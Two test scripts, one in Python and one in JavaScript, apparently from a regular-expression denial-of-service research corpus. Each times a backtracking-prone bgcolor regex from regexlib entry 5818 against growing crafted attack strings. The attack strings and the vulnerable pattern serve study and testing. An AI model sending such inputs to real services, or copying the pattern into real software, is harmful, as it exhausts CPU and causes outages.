File: regexlib/python_re2_test_file/regexlib_5818.py
# 5818
# <.*\b(bgcolor\s*=\s*[\"|\']*(\#\w{6})[\"|\']*).*>
# EXPONENT
# nums:5
# EXPONENT AttackString:""+"<bgcolor=#111111"*512+"! _1SLQ_2"

import re2 as re
from time import perf_counter

regex = """<.*\b(bgcolor\s*=\s*[\"|\']*(\#\w{6})[\"|\']*).*>"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    ATTACK = "" + "<bgcolor=#111111" * i * 1 + "! _1SLQ_2"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *1}: took {DURATION} seconds!")

File: regexlib/2021-5-15/javascript_test_file/regexlib_5818.js
/* 5818
 * <.*\b(bgcolor\s*=\s*[\"|\']*(\#\w{6})[\"|\']*).*>
 * EXPONENT
 * nums:3
 * EXPONENT AttackString:""+"<bgcolor=#111111"*512+"! _1SLQ_2"
 */
var REGEX = /<.*\b(bgcolor\s*=\s*[\"|\']*(\#\w{6})[\"|\']*).*>/
for(var i = 1; i <= 5000000; i++) {
    var time = Date.now();
    var attack_str = '' + '<bgcolor=#111111'.repeat(i*1) + '! _1SLQ_2'
    REGEX.exec(attack_str)
    // REGEX.test(attack_str);
    // attack_str.search(REGEX)
    // attack_str.match(REGEX)
    var time_cost = Date.now() - time;
    console.log(i * 1 + ": " + time_cost+" ms")
}